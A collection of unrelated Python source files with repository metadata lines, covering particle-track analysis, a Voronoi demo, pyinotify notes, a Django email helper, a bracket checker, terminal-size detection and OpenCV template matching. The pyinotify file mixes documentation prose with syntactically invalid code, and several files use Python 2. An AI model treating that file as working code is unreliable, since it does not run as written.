# Find tracks from the prealigned tracklets and stores them with quality
# indicator into track candidates table
track_analysis.find_tracks(
input_tracklets_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5')
)
# The following two steps are for demonstration only.
# They show track fitting and residual calculation on
# prealigned hits. Usually you are not interested in this and will use
# the aligned hits directly.
# Step 1.: Fit the track candidates and create new track table (using the
# prealignment!)
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_prealigned.h5'),
# To get unconstrained residuals do not use DUT
# hit for track fit
exclude_dut_hit=True,
# This is just for demonstration purpose, usually
# uses fully aligned hits
force_prealignment=True,
selection_track_quality=0) # We will cut on chi2
# Step 2.: Calculate the residuals to check the alignment (using the
# prealignment!)
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_prealigned.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder,
'Residuals_prealigned.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
max_chi2=2000,
# This is just for demonstration purpose
# you usually use fully aligned hits
force_prealignment=True)
# Do an alignment step with the track candidates, corrects rotations and
# is therefore much more precise than simple prealignment
dut_alignment.alignment(
input_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Apply the alignment to the merged cluster table to create tracklets
dut_alignment.apply_alignment(
input_hit_file=os.path.join(output_folder, 'Merged.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_hit_file=os.path.join(output_folder, 'Tracklets.h5')
)
# Find tracks from the tracklets and stores the with quality indicator
# into track candidates table
track_analysis.find_tracks(
input_tracklets_file=os.path.join(output_folder, 'Tracklets.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates.h5')
)
# Example 1: use all DUTs in fit and cut on chi2
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(output_folder,
'TrackCandidates.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_all.h5'),
# To get unconstrained residuals do not use DUT
# hit for track fit
exclude_dut_hit=True,
# We do not cut on track quality but on chi2 later
selection_track_quality=0)
# Create unconstrained residuals with chi2 cut
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_all.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_all_chi2_cut.h5'),
# The chi2 cut has a large influence on
# the residuals and number of tracks,
# since the resolution is dominated by
# multiple scattering
max_chi2=500,
n_pixels=n_pixels,
pixel_size=pixel_size)
# Create unconstrained residuals
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_all.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_all.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Example 2: Use only 2 DUTs next to the fit DUT and cut on track quality.
# Thus the track fit is just a track interpolation with chi2 = 0.
# This is better here due to heavily scatterd tracks, where a straight line
# assumption for all DUTs is wrong.
# This leads to symmetric residuals in x and y for all DUTs between 2 DUTs
# (= DUTs: 1, 2, 3, 4)
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(output_folder,
'TrackCandidates.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_some.h5'),
selection_hit_duts=[[1, 2], # Only select DUTs next to the DUT to fit
[0, 2],
[1, 3],
[2, 4],
[3, 5],
[3, 4]],
selection_track_quality=1) # We cut on track quality
# Create unconstrained residuals
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_some.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_some.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Example 3: Use a Kalman Filter to build tracks. This is the best way to build
# tracks in case of heavily scattered tracks.
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(output_folder, 'TrackCandidates.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_all_Kalman.h5'),
exclude_dut_hit=True,
pixel_size=pixel_size,
n_pixels=n_pixels,
beam_energy=5000.,
material_budget=[100. / 125390., 100. / 125390., 100. / 125390., 100. / 125390., 100. / 125390., 100. / 125390.],
selection_track_quality=0,
method='Kalman')
# Create unconstrained residuals
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_all_Kalman.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_all_Kalman.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
npixels_per_bin=10,
nbins_per_pixel=50)
# Main entry point is needed for multiprocessing under windows
if __name__ == '__main__':
# Get the absolute path of example data
tests_data_folder = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))), 'data')
# The location of the data files, one file per DUT
data_files = [analysis_utils.get_data(path='examples/TestBeamData_Mimosa26_DUT%d.h5' % i,
output=os.path.join(tests_data_folder,
'TestBeamData_Mimosa26_DUT%d.h5' % i)) for i in range(6)] # The first device is the reference for the coordinate system
run_analysis(data_files)
| YannickDieter/testbeam_analysis | testbeam_analysis/examples/eutelescope.py | Python | mit | 14,587 | 0.001303 |
# -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import exchange
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| Micronaet/micronaet-migration | sale_exchange/__init__.py | Python | agpl-3.0 | 1,139 | 0.002634 |
import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
import sys
import pickle
import gzip
if __name__ == "__main__":
# w=2500
# h=1500
# w=1920
# h=1080
w = 1024
h = 1024
myscreen = ovdvtk.VTKScreen(width=w, height=h)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInputConnection(w2if.GetOutputPort())
# w2if.Modified()
# lwr.SetFileName("tux1.png")
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 3
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
vod.textScale = 0.02
vod.vertexRadius = 0.0031
vod.drawVertices = 0
vod.drawVertexIndex = 1
vod.drawGenerators = 0
vod.offsetEdges = 1
vd.setEdgeOffset(0.05)
linesegs = 1 # switch to turn on/off line-segments
segs = []
# ovd.Point(1,1)
eps = 0.9
p1 = ovd.Point(-0.1, -0.2)
p2 = ovd.Point(0.2, 0.1)
p3 = ovd.Point(0.4, 0.2)
p4 = ovd.Point(0.6, 0.6)
p5 = ovd.Point(-0.6, 0.3)
pts = [p1, p2, p3, p4, p5]
# t_after = time.time()
# print ".done in {0:.3f} s.".format( t_after-t_before )
times = []
id_list = []
m = 0
t_before = time.time()
for p in pts:
id_list.append(vd.addVertexSite(p))
# print m," added vertex", seg_id[0]
m = m + 1
t_after = time.time()
times.append(t_after - t_before)
# exit()
# print " ",2*Nmax," point-sites sites took {0:.3f}".format(times[0])," seconds, {0:.2f}".format( 1e6*float( times[0] )/(float(2*Nmax)*float(math.log10(2*Nmax))) ) ,"us/n*log(n)"
print "all point sites inserted. ",
vd.check()
# nsegs = Nmax
# nsegs = 5 #Nmax
# n=1
t_before = time.time()
# vd.debug_on()
vd.addLineSite(id_list[0], id_list[1])
# vd.check()
# vd.debug_on()
vd.addLineSite(id_list[1], id_list[2])
# vd.check()
# vd.addLineSite( id_list[2], id_list[3])
# vd.check()
# vd.debug_on()
# vd.addLineSite( id_list[3], id_list[4])
# vd.check()
vd.debug_on()
vd.addLineSite(id_list[4], id_list[1], 10) # FIXME spikes are not allowed, so this does not complete OK
# vd.check()
t_after = time.time()
line_time = t_after - t_before
if line_time < 1e-3:
line_time = 1
times.append(line_time)
# s = id_list[nsegs]
# vd.debug_on()
# vd.addLineSite( s[0], s[1], 10)
# seg = id_list[nsegs]
# vd.addLineSite(seg[0],seg[1],10)
# 1 identify start/endvert
# 2 add line-segment edges/sites to graph
# 3 identify seed-vertex
# 4 create delete-tree
# 5 process/create null faces at start/end
# 6 create LineSite and add pseudo-edges
# 7 create NEW vertices on IN-OUT edges
# 8 add positive/start separator edge
# 9 add negative/start separator edge
# 10 add positive/end separator edge
# 5 create new vertices
# 6 add startpoint pos separator
# 7 add startpoint neg separator
# 8 add end-point pos separator
# 9 add end-point neg separator
# 10 add new edges
# 11 delete delete-tree edges
# 12 reset status
vod.setVDText2(times)
err = vd.getStat()
# print err
print "got errorstats for ", len(err), " points"
if len(err) > 1:
minerr = min(err)
maxerr = max(err)
print "min error= ", minerr
print "max error= ", maxerr
print "num vertices: ", vd.numVertices()
print "num SPLIT vertices: ", vd.numSplitVertices()
calctime = t_after - t_before
vod.setAll()
print "PYTHON All DONE."
myscreen.render()
# w2if.Modified()
# lwr.SetFileName("{0}.png".format(Nmax))
# lwr.Write()
myscreen.iren.Start()
| aewallin/openvoronoi | python_examples/spike_1.py | Python | lgpl-2.1 | 4,238 | 0.001416 |
#!/usr/bin/env python
# #To familiarize yourself with pyinotify, run a first example like this:
#
# # $ cd pyinotify-x-x-x && python setup.py build
# # $ python src/pyinotify/pyinotify.py -v my-dir-to-watch
#
# # Let's start a more detailed example. Say, we want to monitor the temp directory '/tmp' and all its subdirectories for every new file's creation or deletion. For sake of simplicity, we only print messages for every notification on standart output.
# #
# # Now you have the choice to either receive and process the notifications in the thread who instantiate the monitoring, the main benefit is that it doesn't need to instantiate a new thread, the drawback is to block your program in this task. Or, you don't want to block your main thread, so you can handle the notifications in a new separate thread. Choose which one is the most adapted to your needs and is consistent with your constraints and design choices. Next, we will detail the two approaches:
# # Notifier ThreadedNotifier
# #
# # #First the import statements: the watch manager stores the watches and provide operations on watches. EventsCodes bring a set of codes, each code is associated to an event. ProcessEvent is the processing class.
import os
from pyinotify import WatchManager, Notifier, ThreadedNotifier, EventsCodes, ProcessEvent
wm = WatchManager()
#The following class inherit from ProcessEvent, handle notifications and process defined actions with individual processing methods whose the name is written with the specific syntax: process_EVENT_NAME where EVENT_NAME is the name of the handled event to process.
mask = EventsCodes.IN_DELETE | EventsCodes.IN_CREATE # watched events
class PTmp(ProcessEvent):
def process_IN_CREATE(self, event):
print "Create: %s" % os.path.join(event.path, event.name)
def process_IN_DELETE(self, event):
print "Remove: %s" % os.path.join(event.path, event.name)
# This statement instantiate our notifier class and realizes initializations with in particular the inotify's instantiation. The second parameter is a callable object the one which will be used to process notified events this way: PTmp()(event) where event is the notified event.
# The next statement add a watch on the first parameter and recursively on all its subdirectories, note that symlinks are not followed. The recursion is due to the optional parameter named 'rec' set to True. By default, the monitoring is limited to the level of the given directory. It returns a dict where keys are paths and values are corresponding watch descriptors (wd) and is assigned to wdd. An unique wd is attributed to every new watch. It is useful (and often necessary) to keep those wds for further updating or removing one of those watches, see the dedicated section. Obviously, if the monitored element had been a file, the rec parameter would have been ignored whatever its value.
# Let's start reading the events and processing them. Note that during the loop we can freely add, update or remove any watches, we can also do anything we want, even stuff unrelated to pyinotify. We call the stop() method when we want stop monitoring.
class Notifier(watchdir):
notifier = Notifier(wm, PTmp())
watchdir = os.path.abspath(watchdir)
wdd = wm.add_watch(watchdir, mask, rec=True)
while True: # loop forever
try: # process the queue of events as explained above
notifier.process_events()
if notifier.check_events():
notifier.read_events()
# read notified events and enqeue them
# you can do some tasks here...
except KeyboardInterrupt: # destroy the inotify's instance on this interrupt (stop monitoring)
notifier.stop()
break
class ThreadedNotifier(watchdir):
#The second line starts the new thread, doing actually nothing as no directory or file is being monitored.
notifier = ThreadedNotifier(wm, PTmp())
notifier.start()
watchdir = os.path.abspath(watchdir)
wdd = wm.add_watch(watchdir, mask, rec=True)
####
####At any moment we can for example remove the watch on '/tmp' like This:
if wdd[watchdir] > 0: # test if the wd is valid, this test is not mandatory
wm.rm_watch(wdd[watchdir])
### #### Note that its subdirectories (if any) are still being watched. If we wanted to remove '/tmp' and all the watches on its sudirectories, we could have done like that:
####
wm.rm_watch(wdd[watchdir], rec=True)
wm.rm_watch(wdd.values())
notifier.stop()
# That is, most of the code is written, next, we can add, update or remove watches on files or directories with the same principles.
## The only remaining important task is to stop the thread when we wish stop monitoring, it will automatically destroy the inotify's instance. Call the following method:
# The EventsCodes Class top
# Edited Sun, 26 Nov 2006 10:53
# Event Name Is an Event Description
# IN_ACCESS Yes file was accessed.
# IN_ATTRIB Yes metadata changed.
# IN_CLOSE_NOWRITE Yes unwrittable file was closed.
# IN_CLOSE_WRITE Yes writtable file was closed.
# IN_CREATE Yes file/dir was created in watched directory.
# IN_DELETE Yes file/dir was deleted in watched directory.
# IN_DELETE_SELF Yes watched item itself was deleted.
# IN_DONT_FOLLOW No don't follow a symlink (lk 2.6.15).
# IN_IGNORED Yes raised on watched item removing. Probably useless for you, prefer instead IN_DELETE*.
# IN_ISDIR No event occurred against directory. It is always piggybacked to an event. The Event structure automatically provide this information (via .is_dir)
# IN_MASK_ADD No to update a mask without overwriting the previous value (lk 2.6.14). Useful when updating a watch.
# IN_MODIFY Yes file was modified.
# IN_MOVE_SELF Yes watched item itself was moved, currently its full pathname destination can only be traced if its source directory and destination directory are both watched. Otherwise, the file is still being watched but you cannot rely anymore on the given path (.path)
# IN_MOVED_FROM Yes file/dir in a watched dir was moved from X. Can trace the full move of an item when IN_MOVED_TO is available too, in this case if the moved item is itself watched, its path will be updated (see IN_MOVE_SELF).
# IN_MOVED_TO Yes file/dir was moved to Y in a watched dir (see IN_MOVE_FROM).
# IN_ONLYDIR No only watch the path if it is a directory (lk 2.6.15). Usable when calling .add_watch.
# IN_OPEN Yes file was opened.
# IN_Q_OVERFLOW Yes event queued overflowed. This event doesn't belongs to any particular watch.
# IN_UNMOUNT Yes backing fs was unmounted. Notified to all watches located on this fs.
#
#
# wd (int): is the Watch Descriptor, it is an unique identifier who represents the watched item through which this event could be observed.
# path (str): is the complete path of the watched item as given in parameter to the method .add_watch.
# name (str): is not None only if the watched item is a directory, and if the current event has occurred against an element included in that directory.
# mask (int): is a bitmask of events, it carries all the types of events watched on wd.
# event_name (str): readable event name.
# is_dir (bool): is a boolean flag set to True if the event has occurred against a directory.
# cookie (int): is a unique identifier permitting to tie together two related 'moved to' and 'moved from' events.
#
class MyProcessing(ProcessEvent):
def __init__(self):
"""
Does nothing in this case, but you can as well implement this constructor
and you don't need to explicitely call its base class constructor.
"""
pass
def process_IN_DELETE(event):
"""
This method process a specific kind of event (IN_DELETE). event
is an instance of Event.
"""
print '%s: deleted' % os.path.join(event.path, event.name)
def process_IN_CLOSE(event):
"""
This method is called for these events: IN_CLOSE_WRITE,
IN_CLOSE_NOWRITE.
"""
print '%s: closed' % os.path.join(event.path, event.name)
def process_default(event):
"""
Ultimately, this method is called for all others kind of events.
This method can be used when similar processing can be applied
to various events.
"""
print 'default processing'
# Explanations and details:
#
# IN_DELETE have its own method providing a specific treatment. We associate an individual processing method by providing a method whose the name is written with the specific syntax: process_EVENT_NAME where EVENT_NAME is the name of the handled event to process. For the sake of simplicity, our two methods are very basics they only print messages on standart output:
# There are related events which needs most of the time the same treatment. It would be annoying to have to implement two times the same code. In this case we can define a common method. For example we want to share the same method for these two related events:
#
# mask = EventsCodes.IN_CLOSE_WRITE | EventsCodes.IN_CLOSE_NOWRITE
#
# Then it's enough to provide a single processing method named process_IN_CLOSE according to the general syntax process_IN_FAMILYBASENAME. The two previous events will be processed by this method. In this case, beware to not implement process_IN_CLOSE_WRITE or process_IN_CLOSE_NOWRITE, because these methods have an higher precedence (see below), thereby are looked first and would have been called instead of process_IN_CLOSE (for a complete example see: src/examples/close.py).
# It only makes sense to define process_IN_Q_OVERFLOW when its class instance is given to Notifier, indeed it could never be called from a processed object associated to a watch, because this event isn't associated to any watch.
# EventsCodes.ALL_EVENTS isn't an event by itself, that means that you don't have to implement the method process_ALL_EVENTS (even worst it would be wrong to define this method), this is just an alias to tell the kernel we want to be notified for all kind of events on a given watch. The kernel raises individual events (with the IN_ISDIR flag if necessary). Instead, if we need to apply the same actions whatever the kind of event, we should implement a process_default method (for a complete example see: src/examples/simple.py).
# Processing methods lookup's order (ordered by increasing order of priority): specialized method (ex: process_IN_CLOSE_WRITE) first, then family method (ex: process_IN_CLOSE), then default method (process_default).
# One more thing: say you redifine the method process_default which contains the instruction os.ismount(my-mount-point), it would be for example a mistake having this method called for every event IN_OPEN occurred in /etc. Because, one particularity of os.ismount is to check in /etc/mtab if the partition is mounted, so we could easily imagine the kind of endless situation: call process_IN_OPEN, open /etc/mtab, call process_IN_OPEN, open /etc/mtab ... loop forever.
#
# Whenever possible you should process your notifications this way, with a single processing object. It is easy to imagine the benefits to have to deal with only one instance (efficiency, data sharing,...):
path = os.path.abspath(watchdir)
notifier = Notifier(wm, MyProcessing())
mask = EventsCodes.ALL_EVENTS
wm.add_watch(path, mask, proc_fun=MyProcessing())
# Read notifications, process events.
# watch_manager is an instance of WatchManager.
# default_proc_funcis an instance of ProcessEvent or one of its subclasses.
Notifier(watch_manager, default_proc_func=ProcessEvent())
check_events(timeout=4) #=> None #Check for new events available to read.
timeout(int) #timeout passed on to select.select().
process_events() #=> None # #Routine for processing events from queue by calling their associated processing function (instance of ProcessEvent or one of its subclasses).
read_events() #=> None #Read events from device and enqueue them, waiting to be processed.
stop() #=> None #Stop the notifications.
ThreadedNotifier(watch_manager, default_proc_func=ProcessEvent())
# This notifier inherits from threading.Thread and from Notifier, instantiating a separate thread, and providing standart Notifier functionalities. This is a threaded version of Notifier.
# watch_manager is an instance of WatchManager.
# default_proc_funcis an instance of ProcessEvent or one of its subclasses.
# inherits all the methods of Notifier but override the stop() method.
start() #=> None #Start the new thread, start events notifications.
stop() #=> None #Stop the thread, stop the notifications.
#Represent a watch, i.e. a file or directory being watched.
# def Watch(wd, path, mask, proc_func, auto_add):
# wd(int) = wd #Watch Descriptor.
# path = os.path.abspath(watchdir)
# #path(str) = path # Path of the file or directory being watched.
# mask(int) = mask #Mask.
# proc_fun(ProcessEvent) = proc_func #Processing object.
# auto_add(bool) = auto_add #Automatically add watches on creation of directories.
#The Watch Manager lets the client add a new watch, store the active watches, and provide operations on these watches.
##Add watch(s) on given path(s) with the specified mask.
class WatchManager(watchdir):
path = os.path.abspath(watchdir) #path = list() ##(str or list of str): ## Path(s) to watch, the path can either be a file or a directory.
add_watch(path, mask, proc_fun=None, rec=False, auto_add=False) = dict() #=> dict
mask(int) = int(mask) #Bitmask of events.
proc_func(ProcessEvent) = proc_func ### Processing object (must be callable). Will be called if provided, otherwise, notifier.default_proc_funcwill be called.
rec(bool) = bool(rec) ###### Recursively add watches on the given path and on all its subdirectories.
auto_add(bool) = bool(auto_add) # Automatically add watches on newly created directories in the watch's path.
update_watch(wd, mask=None, proc_func=None, rec=False, auto_add=False) = update_watch #=> dict
#Update existing watch(s). All these parameters are updatable.
rm_watch(wd, rec=False) = dict() #=> dict #Remove watch(s).
get_wd(path) #=> int #Return the watch descriptor associated to path.
get_path(wd) #=> str #Return the path associated to wd, if wd is invalid, None is returned.
return os.path.abspath(wd)
ra = notifier.add_watch('/a-dir', mask)
if ra['/a-dir'] > 0: print "added"
#update_watch wd (or list of wds) {wd1: success, wd2: success, ...}
#Where success is True if the op on wdx succeeded, False otherwise.
ru = notifier.update_watch(ra['/a-dir'], new_mask)
if ru['/a-dir']: print "updated"
#rm_watch wd (or list of wds) {wd1: success, wd2: success, ...}
#Where success is True if the op on wdx succeeded, False otherwise.
rr = notifier.rm_watch(ra['/a-dir'])
if rr['/a-dir']: print "deleted"
| relic7/prodimages | python/DirWatchManager.py | Python | mit | 15,047 | 0.009238 |
"""
send mail with html template
"""
import logging
from django.template.loader import render_to_string
from common.notify import Notify
class Email:
def __init__(self):
self.logger = logging.getLogger('userquery')
def send(self, data):
self.logger.info("Sending mail by template %s" % data["template"])
subject = "UserQuery - %s" % data["subject"]
body = render_to_string(data["template"], data)
Notify().send_email(subject, body, data["email"])
| linea-it/dri | api/userquery/email.py | Python | gpl-3.0 | 519 | 0.007707 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.iff"
result.attribute_template_id = -1
result.stfName("lair_n","thicket")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | obi-two/Rebelion | data/scripts/templates/object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.py | Python | mit | 468 | 0.047009 |
# python3
import sys
class Bracket:
def __init__(self, bracket_type, position):
self.bracket_type = bracket_type
self.position = position
def Match(self, c):
if self.bracket_type == '[' and c == ']':
return True
if self.bracket_type == '{' and c == '}':
return True
if self.bracket_type == '(' and c == ')':
return True
return False
if __name__ == "__main__":
text = sys.stdin.read()
opening_brackets_stack = []
index = []
for i, next in enumerate(text):
match = True
if next == '(' or next == '[' or next == '{':
# Process opening bracket, write your code here
opening_brackets_stack.append(Bracket(next,i))
index.append(i+1)
if next == ')' or next == ']' or next == '}':
if len(opening_brackets_stack) == 0 or opening_brackets_stack.pop().Match(next) == False:
match = False
index.append(i+1)
break
index.pop()
# Process closing bracket, write your code here
# Printing answer, write your code here
if match == False or len(opening_brackets_stack) > 0:
print(index.pop())
else:
print("Success") | supermikol/coursera | Data Structures/Week 1/check_brackets_in_code/check_brackets.py | Python | mit | 1,323 | 0.005291 |
#!/usr/bin/env python
# Source: https://gist.github.com/jtriley/1108174
import os
import shlex
import struct
import platform
import subprocess
def get_terminal_size():
""" getTerminalSize()
- get width and height of console
- works on linux,os x,windows,cygwin(windows)
originally retrieved from:
http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
"""
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in ['Linux', 'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
cols = int(subprocess.check_call(shlex.split('tput cols')))
rows = int(subprocess.check_call(shlex.split('tput lines')))
return (cols, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
if __name__ == "__main__":
sizex, sizey = get_terminal_size()
print('width =', sizex, 'height =', sizey)
| graveljp/smugcli | smugcli/terminal_size.py | Python | mit | 2,716 | 0.002577 |
# coding: utf-8
# Given code that can extract the contents of the inner rectangles (boxes), we can determine whether the
# contents have changed.
#
# Here, take an image of the previous box and see whether the same contents are still there. The idea is that
# a name does not only get erased, it may also be replaced. We hope to find something more robust than the ink
# method (exploration-2).
#
# In[1]:
LIVENOTEBOOK = True
import cv2
cv2.__version__
import extract_blue_grid
get_contents = extract_blue_grid.get_contents
# In[2]:
def get_content1(imagepath):
"return 2nd box and contour from get_contents"
boxes, contours = get_contents(imagepath)
return boxes[1], contours[1]
# In[3]:
import numpy as np
import matplotlib.pyplot as plt
from skimage.measure import compare_ssim
def imshow(img): plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
imwriting1 = cv2.imread("../reference/frame276.png")
imwriting2 = cv2.imread("../reference/frame280.png")
imempty = cv2.imread("../reference/frame272.png")
if LIVENOTEBOOK:
get_ipython().magic(u'matplotlib inline')
# test plotting
imshow(np.concatenate([imwriting1,imwriting2,imempty], axis=1))
# In[ ]:
# not used:
def threshold_boxes(boxes):
"""Given a list of images, adaptive threshold each image"""
output = []
for img in boxes:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
dst = cv2.adaptiveThreshold(img, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
output.append(dst)
return output
# In[4]:
get_ipython().magic(u'matplotlib inline')
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))
writing1,contours1 = get_content1("../reference/frame276.png")
writing1 = cv2.morphologyEx(writing1, cv2.MORPH_OPEN, kernel)
writing1 = cv2.cvtColor(writing1, cv2.COLOR_BGR2GRAY)
#writing1 = cv2.adaptiveThreshold(writing1, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
writing2,contours2 = get_content1("../reference/frame280.png")
writing2 = cv2.morphologyEx(writing2, cv2.MORPH_OPEN, kernel)
writing2 = cv2.cvtColor(writing2, cv2.COLOR_BGR2GRAY)
#writing2 = cv2.adaptiveThreshold(writing2, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
empty,contoursempty = get_content1("../reference/frame272.png")
empty = cv2.morphologyEx(empty, cv2.MORPH_OPEN, kernel)
empty = cv2.cvtColor(empty, cv2.COLOR_BGR2GRAY)
#empty = cv2.adaptiveThreshold(empty, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
plt.imshow(np.concatenate([writing1,writing2,empty]))
#plt.imshow(writing1)
#writing1.shape, writing2.shape, empty.shape
# In[5]:
writingb, contoursb = get_content1("../reference/frame274.png")
writingb = cv2.morphologyEx(writingb, cv2.MORPH_OPEN, kernel)
writingb = cv2.cvtColor(writingb, cv2.COLOR_BGR2GRAY)
writingc, contoursc = get_content1("../reference/frame275.png")
writingc = cv2.morphologyEx(writingc, cv2.MORPH_OPEN, kernel)
writingc = cv2.cvtColor(writingc, cv2.COLOR_BGR2GRAY)
plt.imshow(np.concatenate([writing1,writingb,writingc]))
# In[6]:
# matching does not work on a whole image: it looks like it does:
img = writing1.copy()
method = cv2.TM_SQDIFF
w, h = writing1.shape[::-1]
res = cv2.matchTemplate(writingb,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val )
plt.imshow(img)
# In[ ]:
# but it another word too
img = writing2.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# In[ ]:
# and it matches empty just as well..
img = empty.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
